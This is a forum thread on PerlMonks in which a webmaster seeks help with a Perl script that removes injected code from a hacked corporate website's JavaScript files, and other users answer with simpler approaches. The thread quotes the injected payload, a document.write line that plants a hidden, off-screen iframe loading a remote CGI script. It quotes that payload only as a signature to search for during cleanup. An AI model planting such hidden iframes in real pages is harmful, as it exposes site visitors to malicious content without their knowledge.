Re^3: Hacking of JavaScript files in our corporate website

Here is the code I am working on. It works for sample data, but for the actual data, it is not working. I am working on the backup of the live files and presently using the following script. I am working on Active Perl 5.14 on Windows. Please help.

#!/usr/bin/perl

use strict;
 
# show no warnings about recursion (we know what we do  )
no warnings "recursion";
 
# specify the file you search here (in this example "corporate" ) :
my $file = '\.js$';
my @jsfiles = ();
 
# specify the directory where you want to start the search (in this ex
+ample ".", the current directory) :
my $searchdir = "C:/scripts/corporate";
my $replace_string = "SAMPLE TEXT TO REPLACE";
 
# Calling the Subroutine, which searches the File
readDirectory($searchdir, $file);

print "\n", '*' x 60, "\n";
foreach my $js (@jsfiles) {

    open JAVASCRIPT, '<', "$js" or die "Cannot open file for read ($!)
+";
    open TEMP, '>', "temp.js" or die "Cannot open file for write ($!)"
+;
    #Enable slurp mode
    local $/;
    my $data = <JAVASCRIPT>;
    $data =~ s/$replace_string//g;
    print TEMP $data;
    close JAVASCRIPT;
    close TEMP;
    unlink $js;
    rename "temp.js", $js;
    print "$js\n";
}
print "\n", '*' x 60, "\n";
 
# We need an Subroutine, which can be called on every sub-directory
sub readDirectory
{
     my $searchdir = shift;
     my $searchfile = shift;
 
     # a little bit output, in which directory the script
     # is searching at the moment (the following line is not necessary
+)
     print "Searching in $searchdir \n";
 
     # Open and close the directory
     opendir DIR, $searchdir or die("An error occured: $!");
     my @files = readdir(DIR);
     closedir DIR;
 
     foreach my $currentFile (@files)
     {
          # In Unix/Linux we have the directorys "." and "..",
          # it's no good idea to scan these, so let them skip.
          next if $currentFile =~ /^\./;
 
          # Lets have a look, if the current "file" is the searched fi
+le,
          # else have a look, if the "file" is an directory,
          # and if its one, lets have a look, if the searched file is 
+into it.
          if ( $currentFile =~ /$searchfile/ )
          {
               # We found the right file, now we can do somthing with 
+it,
               # in this case, we only print a text
               push @jsfiles, "$searchdir/$currentFile";
               print "Found the file: $searchdir/$currentFile\n";
          }
          if ( -d "$searchdir/$currentFile" )
          {
               # The Subroutine i calling hisself with the new paramet
+ers
               readDirectory("$searchdir/$currentFile", $searchfile);
          }
     }
}
[download]

Here is a code signature of the hacked .js files

;document.write('<iframe width="50" height="50" style="width:100px;hei
+ght:100px;position:absolute;left:-100px;top:0;" src="http : / / ipxlq
+fn . freewww . info / 9a06efb5c 8163b982c1 1a64762e27 d . cgi ? 8"></
+iframe>');
[download]

I want to make the above code to get replaced instead of the sample pattern.

Comment on Re^3: Hacking of JavaScript files in our corporate website Select or Download Code

Replies are listed 'Best First'.
Re^4: Hacking of JavaScript files in our corporate website by CountZero (Bishop) on Dec 17, 2012 at 19:03 UTC
It is not more complicated than this: use Modern::Perl; use File::Find::Rule; use File::Slurp qw/edit_file_lines/; my $searchdir = "C:/scripts/corporate"; my $hacker_signature = q\|;document.write('<iframe width="50" height="50" style="width:100px;h +eight:100px;position:absolute;left:-100px;top:0;" src="http : / / ipx +lqfn . freewww . info / 9a06efb5c 8163b982c1 1a64762e27 d . cgi ? 8"> +</iframe>');\|; my @jsfiles = find( file => name => '*.js' => in => $searchdir ); for my $file (@jsfiles) { edit_file_lines { $_ = "DELETED HACKED CONTENT\n" if /$hacker_signature/ } $file; } [download] Warning: Do not run this on a ~~life~~live server. I expect this script to run rather fast, so you can stop the server before you run this. Downtime will be minimal. And of course, back-up the files before you start this script. CountZero A program should be light and agile, its subroutines connected like a string of pearls. The spirit and intent of the program should be retained throughout. There should be neither too little or too much, neither needless loops nor useless variables, neither lack of structure nor overwhelming rigidity." - The Tao of Programming, 4.1 - Geoffrey James My blog: Imperial Deltronics	[reply] [d/l]
Re^4: Hacking of JavaScript files in our corporate website by Anonymous Monk on Dec 17, 2012 at 14:23 UTC
I would rethink this `# show no warnings about recursion (we know what we do ) no warnings "recursion";` [download] You can replace that with `use File::Find::Rule; my @jsfiles = find( file => name => qr{\.js$} => in => $searchdir );` Or even the iterator version (if you have thousands of files), example in Re^2: Write to existing file with character insert	[reply] [d/l]